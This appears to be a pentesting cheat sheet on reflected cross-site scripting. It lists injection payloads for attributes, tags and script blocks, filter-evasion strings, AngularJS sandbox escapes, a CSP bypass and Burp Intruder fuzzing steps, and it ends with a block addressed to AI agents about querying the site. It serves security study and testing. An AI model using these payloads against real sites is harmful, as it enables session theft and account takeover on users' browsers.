# Reflected

## Context

### AccessKey Attribute

Set a global accessKey parameter. When the user presses the selected key, a script will be executed. Works only on Chrome

```
<url>/?%27accesskey=%27<key>%27onclick=%27alert(1)
```

### HTML Parameter

```
"><script>...</script>
"><svg onload="...">
"><img src=. onerror="...">

//in case brackets are escaped, give onfocus event and focus on self
" autofocus onfocus="..." x="
" onmouseover="..." x="
```

Anchor href parameter poisoning

```
href="javascript:'...'"
```

### HTML Tags

1. Find vulnerable field
2. Send request to Burp Intruder as following `<§[payload]§>` to find unfiltered tags
3. Set the payload to a list of tags (see [here](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) and start the attack
4. After finding an unfiltered tag set the payload to `<[tag]+§[payload]§="alert()">`
5. Set the payload to a list of events (see [here](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) and start the attack
6. After finding a suitable event the basic payload will be`<[tag]+[event]="[js]">`

Deliver through IFrame

```
<iframe src="<url>" onload="...">
```

Deliver with custom tag with autofocus

```
<script>
location = "<url>/?search=<xss id='x' onfocus='...' tabindex=1>#x";
</script>
```

### Javascript Block

Escape from string such as `var x = 'input'`

```
</script><script>...</script>
```

Escape from strings with angled brackets encoded

```
'-<payload>-'
';<payload>//
```

Evade filters

```
\';<...>//                    //double quote filter
onerror=<func>;throw <arg>    //assign to error event.
&apos;-<...>-&apos;           //HTML escaped quotes
```

### JS Template Literals

JS template strings are declared between backticks and use `${...}` notation to evaluate code and inject the result in the string.

```
`Welcome, ${user.displayName}.`;
```

To execute code simply inject `${<...>}` in the string

### AngularJS Sandbox Escape

Sandbox escape by owerwriting the charAt method to join characters instead of evaluoating them one at a time

```
toString().constructor.prototype.charAt%3d[].join;
```

Code execution payloads

```
$eval('x=<...>')
[1]|orderBy:toString().constructor.fromCharCode(120 61 <charcode payload>)=1  //120 61 is for 'x='
```

Content Security Policy Bypass

```
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],<...>)'">
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security-notes.gitbook.io/security-notes/web-attacks/xss/reflected.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.